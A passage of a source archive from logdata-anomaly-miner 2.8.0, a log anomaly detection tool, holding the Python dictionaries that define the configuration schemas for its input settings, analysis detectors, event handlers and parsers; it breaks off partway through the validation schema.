{ 'required': False, 'type': 'integer', 'default': 104857600, # 100 Megabytes 'min': 1 }, 'Log.Rotation.BackupCount': { 'required': False, 'type': 'integer', 'default': 5, 'min': 1 }, 'Log.Encoding': { 'required': False, 'type': 'string', 'empty': False }, 'AminerId': { 'required': False, 'type': 'string', 'empty': False }, 'LogLineIdentifier': { 'required': False, 'type': 'boolean', 'default': False }, 'Input': { 'required': True, 'type': 'dict', 'schema': { 'multi_source': {'type': 'boolean', 'required': False, 'default': False}, 'timestamp_paths': {'type': ['string', 'list'], 'empty': False, 'required': True}, 'adjust_timestamps': {'type': 'boolean', 'required': False, 'default': False}, 'sync_wait_time': {'type': ['integer', 'float'], 'min': 1, 'default': 5}, 'eol_sep': {'type': 'string', 'required': False, 'default': '\n', 'empty': False}, 'json_format': {'type': 'boolean', 'required': False, 'default': False}, 'use_real_time': {'type': 'boolean', 'required': False, 'default': False}, 'xml_format': {'type': 'boolean', 'required': False, 'default': False}, 'continuous_timestamp_missing_warning': {'type': 'boolean', 'required': False, 'default': False} } } } logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation/000077500000000000000000000000001500476301700335055ustar00rootroot00000000000000AnalysisNormalisationSchema.py000066400000000000000000000411201500476301700414420ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'nullable': True, 'default': None}, 'type': {'type': 'analysistype', 'coerce': 'toanalysistype', 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'labels': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'persistence_id': {'type': 'string', 'default': 'Default'}, 'output_logline': {'type': 'boolean', 'default': False}, 'learn_mode': {'type': 'boolean'}, 'num_windows': {'type': 'integer', 'required': True, 'default': 50}, 'min_anomaly_score': {'type': 'float', 'required': False, 'default': 1.1}, 'min_variance': {'type': 'float', 'required': False, 'default': 0.98}, 'allow_missing_values': {'type': 'boolean', 'default': False}, 'check_interval': {'type': 'integer', 'default': 3600}, 'realert_interval': {'type': 'integer', 'default': 36000}, 'report_interval': {'type': 'integer', 'default': 10}, 'reset_after_report_flag': {'type': 'boolean', 'default': False}, 'path': {'type': 'string', 'nullable': True, 'default': 'Default'}, 'parallel_check_count': {'type': 'integer', 'required': True, 'default': 10}, 'record_count_before_event': {'type': 'integer', 'default': 1000}, 'use_path_match': {'type': 'boolean', 'default': True}, 'use_value_match': {'type': 'boolean', 'default': True}, 'min_rule_attributes': {'type': 'integer', 'default': 1}, 'max_rule_attributes': {'type': 'integer', 'default': 5}, 'max_hypotheses': {'type': 'integer', 'default': 1000}, 'hypothesis_max_delta_time': {'type': 'float', 'default': 5.0}, 'generation_probability': {'type': 'float', 'default': 1.0}, 'generation_factor': {'type': 'float', 'default': 1.0}, 'max_observations': {'type': 'integer', 'default': 500}, 'p0': {'type': 'float', 'default': 0.9}, 'alpha': {'type': 'float', 'default': 0.05}, 'candidates_size': {'type': 'integer', 'default': 10}, 'hypotheses_eval_delta_time': {'type': 'float', 'default': 120.0}, 'delta_time_to_discard_hypothesis': {'type': 'float', 'default': 180.0}, 'check_rules_flag': {'type': 'boolean', 'default': True}, 'constraint_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'ignore_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'id_path_list': {'type': 'list', 'default': []}, 'scoring_path_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'unique_path_list': { 'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'prob_thresh': {'type': 'float', 'default': 0.05}, 'default_freqs': {'type': 'boolean', 'default': False}, 'skip_repetitions': {'type': 'boolean', 'default': False}, 'seq_len': {'type': 'integer', 'default': 3}, 'timeout': {'type': ['integer', 'float'], 'nullable': True, 'default': None}, 'allow_missing_id': {'type': 'boolean', 'default': False}, 'window_size': {'type': ['integer', 'float'], 'default': 600}, 'confidence_factor': {'type': 'float', 'default': 0.33}, 'min_allowed_time_diff': {'type': 'float', 'default': 5.0}, 'lower_limit': {'type': ['integer', 'float']}, 'upper_limit': {'type': ['integer', 'float']}, 'idf': {'type': 'boolean', 'default': False}, 'norm': {'type': 'boolean', 'default': False}, 'add_normal': {'type': 'boolean', 'default': False}, 'check_empty_windows': {'type': 'boolean', 'default': False}, 'bin_size': {'type': 'integer'}, 'bin_count': {'type': 'integer'}, 'outlier_bins_flag': {'type': 'boolean', 'default': False}, 'modulo_value': {'type': 'integer'}, 'time_unit': {'type': 'integer'}, 'histogram_defs': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}}, 'bin_definition': {'type': 'string'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True, 'default': None}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True, 'default': None}, 'timestamp_path': {'type': 'string', 'nullable': True}, 'min_bin_elements': {'type': 'integer'}, 'min_bin_time': {'type': 'integer'}, 'debug_mode': {'type': 'boolean', 'default': False}, # TODO check which streams should be allowed 'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr']}, 'separator': {'type': 'string'}, 'missing_value_string': {'type': 'string'}, 'subhandler_list': {'type': 'list', 'schema': {'type': 'string'}}, 'stop_when_handled_flag': {'type': 'boolean', 'default': False}, 'delete_components': {'type': 'boolean', 'default': True}, 'event_type': {'type': 'string'}, 'event_message': {'type': 'string'}, 'sub_rules': {'type': 'list', 'schema': {'type': 'string'}}, 'sub_rule': {'type': 'string'}, 'match_action': {'type': 'string', 'nullable': True, 'default': None}, 'rule_lookup_dict': {'type': 'dict'}, 'default_rule': {'type': 'string', 'nullable': True, 'default': None}, 'value': {'type': ['boolean', 'float', 'integer', 'string']}, 'regex': {'type': 'string'}, 'seconds_modulo': {'type': 'integer'}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer'}, 'nullable': True, 'default': None}, 'rule_id': {'type': 'string'}, 'min_time_delta': {'type': 'integer'}, 'max_time_delta': {'type': 'integer'}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True, 'default': None}, 'max_violations': {'type': 'integer', 'default': 20}, 'action_id': {'type': 'string'}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None}, 'ruleset': {'type': 'list', 'schema': {'type': 'string'}}, 'exit_on_error_flag': {'type': 'boolean', 'default': False}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string'}}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True, 'default': None}, 'parsed_atom_handler_dict': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}}, 'min_num_vals': {'type': 'integer', 'default': 1000}, 'max_num_vals': {'type': 'integer', 'default': 1500}, 'save_values': {'type': 'boolean', 'default': True}, 'waiting_time': {'type': 'integer', 'default': 300}, 'num_sections_waiting_time': {'type': 'integer', 'default': 10}, 'event_type_detector': {'type': 'string'}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS'], 'default': 'CM'}, 'gof_alpha': {'type': 'float', 'default': 0.05}, 's_gof_alpha': {'type': 'float', 'default': 0.05}, 's_gof_bt_alpha': {'type': 'float', 'default': 0.05}, 'd_alpha': {'type': 'float', 'default': 0.1}, 'd_bt_alpha': {'type': 'float', 'default': 0.1}, 'range_alpha': {'type': 'float', 'default': 0.05}, 'dw_alpha': {'type': 'float', 'default': 0.05}, 'div_thres': {'type': 'float', 'default': 0.3}, 'sim_thres': {'type': 'float', 'default': 0.1}, 'indicator_thres': {'type': 'float', 'default': 0.4}, 'num_init': {'type': 'integer', 'default': 100}, 'num_update': {'type': 'integer', 'default': 50}, 'num_update_unq': {'type': 'integer', 'default': 200}, 'num_s_gof_values': {'type': 'integer', 'default': 50}, 'num_s_gof_bt': {'type': 'integer', 'default': 30}, 'num_d_bt': {'type': 'integer', 'default': 30}, 'num_pause_discrete': {'type': 'integer', 'default': 5}, 'num_pause_others': {'type': 'integer', 'default': 2}, 'test_gof_int': {'type': 'boolean', 'default': True}, 'num_stop_update': {'type': 'boolean', 'default': False}, 'silence_output_without_confidence': {'type': 'boolean', 'default': False}, 'silence_output_except_indicator': {'type': 'boolean', 'default': True}, 'num_var_type_hist_ref': {'type': 'integer', 'default': 10}, 'num_update_var_type_hist_ref': {'type': 'integer', 'default': 10}, 'num_var_type_considered_ind': {'type': 'integer', 'default': 10}, 'num_stat_stop_update': {'type': 'integer', 'default': 200}, 'num_updates_until_var_reduction': {'type': 'integer', 'default': 20}, 'var_reduction_thres': {'type': 'float', 'default': 0.6}, 'num_skipped_ind_for_weights': {'type': 'integer', 'default': 1}, 'num_ind_for_weights': {'type': 'integer', 'default': 100}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi'], 'default': 'Chi'}, 'use_empiric_distr': {'type': 'boolean', 'default': True}, 'save_statistics': {'type': 'boolean', 'default': True}, 'split_reports_flag': {'type': 'boolean', 'default': False}, 'disc_div_thres': {'type': 'float', 'default': 0.3}, 'num_steps_create_new_rules': {'type': 'integer', 'default': -1}, 'num_upd_until_validation': {'type': 'integer', 'default': 20}, 'num_end_learning_phase': {'type': 'integer', 'default': -1}, 'check_cor_thres': {'type': 'float', 'default': 0.5}, 'check_cor_prob_thres': {'type': 'float', 'default': 1.0}, 'check_cor_num_thres': {'type': 'integer', 'default': 10}, 'min_values_cors_thres': {'type': 'integer', 'default': 5}, 'new_vals_alarm_thres': {'type': 'float', 'default': 3.5}, 'num_bt': {'type': 'integer', 'default': 30}, 'alpha_bt': {'type': 'float', 'default': 0.1}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist'], 'default': 'Chi'}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax'], 'default': 'MinMax'}, 'range_threshold': {'type': 'float', 'default': 1}, 'range_limits_factor': {'type': 'float', 'default': 1}, 'num_reinit_range': {'type': 'integer', 'default': 100}, 'alpha_chisquare_test': {'type': 'float', 'default': 0.05}, 'max_dist_rule_distr': {'type': 'float', 'default': 0.1}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True, 'default': None}, 'intersect_presel_meth': {'type': 'boolean', 'default': False}, 'percentage_random_cors': {'type': 'float', 'default': 0.20}, 'match_disc_vals_sim_tresh': {'type': 'float', 'default': 0.7}, 'exclude_due_distr_lower_limit': {'type': 'float', 'default': 0.4}, 'match_disc_distr_threshold': {'type': 'float', 'default': 0.5}, 'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True, 'default': None}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True, 'default': None}, 'validate_cor_cover_vals_thres': {'type': 'float', 'default': 0.7}, 'validate_cor_distinct_thres': {'type': 'float', 'default': 0.05}, 'time_period_length': {'type': 'integer', 'min': 1, 'required': True, 'default': 86400}, 'max_time_diff': {'type': 'integer', 'min': 1, 'required': True, 'default': 360}, 'num_reduce_time_list': {'type': 'integer', 'min': 1, 'required': True, 'default': 10}, 'output_event_handlers': {'type': 'list', 'nullable': True, 'default': None}, 'suppress': {'type': 'boolean', 'default': False}, 'build_sum_over_values': {'type': 'boolean', 'default': False}, 'num_division_time_step': {'type': 'integer', 'default': 10}, 'num_min_time_history': {'type': 'integer', 'default': 20}, 'num_max_time_history': {'type': 'integer', 'default': 30}, 'num_results_bt': {'type': 'integer', 'default': 15}, 'round_time_interval_threshold': {'type': 'float', 'default': 0.02}, 'acf_threshold': {'type': 'float', 'default': 0.2}, 'acf_pause_interval_percentage': {'type': 'float', 'default': 0.2}, 'acf_auto_pause_interval': {'type': 'boolean', 'default': True}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1, 'required': True, 'default': 10}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'default': 10000}, 'time_output_threshold': {'type': 'integer', 'default': 0}, 'anomaly_threshold': {'type': 'float', 'default': 0.05}, 'num_periods_tsa_ini': {'type': 'integer', 'default': 20}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True, 'default': None}, 'force_period_length': {'type': 'boolean', 'default': False}, 'set_period_length': {'type': 'integer', 'default': 604800}, 'min_log_lines_per_time_step': {'type': 'integer', 'default': 10}, 'empty_window_warnings': {'type': 'boolean', 'default': True}, 'early_exceeding_anomaly_output': {'type': 'boolean', 'default': False}, 'set_lower_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None}, 'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None}, 'local_maximum_threshold': {'type': 'float', 'default': 0.2}, 'combine_values': {'type': 'boolean', 'nullable': True, 'default': True}, 'season': {'type': 'float', 'nullable': True, 'default': None}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'default': None, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'default': None, 'min': 0.000001}, 'avg_factor': {'type': 'float', 'min': 0, 'default': 1}, 'var_factor': {'type': 'float', 'min': 0, 'default': 2}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None} } } } } EventHandlerNormalisationSchema.py000066400000000000000000000024301500476301700422370ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'required': True}, 'type': {'type': 'eventhandlertype', 'coerce': 'toeventhandlertype', 'required': True}, 'json': {'type': 'boolean', 'default': False}, 'score': {'type': 'boolean', 'default': False}, 'instance_name': {'type': 'string', 'default': 'aminer'}, 'topic': {'type': 'string'}, 'url': {'type': 'string', 'default': 'ipc:///tmp/aminer'}, 'cfgfile': {'type': 'string', 'default': '/etc/aminer/kafka-client.conf'}, 'options': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': ['string', 'list', 'integer']}}}, 'output_file_path': {'type': 'string'}, 'pretty': {'type': 'boolean', 'default': True}, 'weights': {'type': 'dict', 'nullable': True, 'default': None}, 'auto_weights': {'type': 'boolean', 'default': False}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1} } } } } ParserNormalisationSchema.py000066400000000000000000000052501500476301700411170ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/normalisation{ 'Parser': { 'required': True, 'type': 'list', 'has_start': True, 'schema': { 'type': 'dict', 'schema': { 'id': {'type': 'string', 'required': True}, 'start': {'type': 'boolean'}, 'type': {'type': 'parsermodel', 'coerce': 'toparsermodel', 'required': True}, 'name': {'type': 'string', 'required': True}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'nullable': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': { 'type': ['boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string'}}}}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True}}}}}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank'], 'default': 'none'}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'}, 'start_year': {'type': 'integer', 'nullable': True, 'default': None}, 'delimiter': {'type': 'string'}, 'escape': {'type': 'string', 'nullable': True, 'default': None}, 'consume_delimiter': {'type': 'boolean', 'default': False}, 'key_parser_dict': {'type': 'dict'}, 'optional_key_prefix': {'type': 'string', 'default': 'optional_key_'}, 'nullable_key_prefix': {'type': 'string', 'default': '+'}, 'strict': {'type': 'boolean', 'default': False}, 'ignore_null': {'type': 'boolean', 'default': True}, 'date_format': {'type': 'string', 'minlength': 2}, 'text_locale': {'type': 'string', 'nullable': True, 'default': None}, 'max_time_jump_seconds': {'type': 'integer', 'default': 86400}, 'timestamp_scale': {'type': 'integer', 'default': 1}, 'allow_all_fields': {'type': 'boolean', 'default': False}, 'xml_header_expected': {'type': 'boolean', 'default': False}, 'attribute_prefix': {'type': 'string', 'default': '+'}, 'optional_attribute_prefix': {'type': 'string', 'default': '_'}, 'empty_allowed_prefix': {'type': 'string', 'default': '?'}, 'time_zone': {'type': 'string', 'nullable': True, 'default': 'UTC'}, } } }, } logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/000077500000000000000000000000001500476301700327605ustar00rootroot00000000000000AnalysisValidationSchema.py000066400000000000000000001674261500476301700402120ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AllowlistViolationDetector'], 'required': True}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchPathFilter'], 'required': True}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchValueFilter'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'parsed_atom_handler_dict': { 'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True}, 'type': {'type': 'string', 'allowed': ['PCADetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'min_anomaly_score': {'type': 'float'}, 'min_variance': {'type': 'float'}, 'num_windows': {'type': 'float'}, 'persistence_id': {'type': 'string'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EnhancedNewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCorrelationDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'max_hypotheses': {'type': 'integer', 'min': 1}, 'hypothesis_max_delta_time': {'type': 'float', 'min': 0.01}, 'generation_probability': {'type': 'float', 'min': 0, 'max': 1}, 'generation_factor': {'type': 'float', 'min': 0, 'max': 1}, 'max_observations': {'type': 'integer', 'min': 1}, 'p0': {'type': 'float', 'min': 0, 'max': 1}, 'alpha': {'type': 'float', 'min': 0, 'max': 1}, 'candidates_size': {'type': 'integer', 'min': 1}, 'hypotheses_eval_delta_time': {'type': 'float', 'min': 0.01}, 'delta_time_to_discard_hypothesis': { 'type': 'float', 'min': 0.01, 'bigger_than_or_equal': ['hypotheses_eval_delta_time', 120.0]}, 'check_rules_flag': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'unique_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'empty_window_warnings': {'type': 'boolean'}, 'early_exceeding_anomaly_output': {'type': 'boolean'}, 'season': {'type': 'float', 'min': 0, 'nullable': True}, 'set_lower_limit': {'type': ['integer', 'float'], 'min': 0, 'nullable': True}, 'set_upper_limit': {'type': ['integer', 'float'], 'min': 0, 'nullable': True}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCountClusterDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'idf': {'type': 'boolean'}, 'norm': {'type': 'boolean'}, 'add_normal': {'type': 'boolean'}, 'check_empty_windows': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventSequenceDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'seq_len': {'type': 'integer', 'min': 1}, 'timeout': {'type': 'integer', 'min': 0.1, 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['CharsetDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EntropyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'prob_thresh': {'type': 'float'}, 'default_freqs': {'type': 'boolean'}, 'skip_repetitions': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 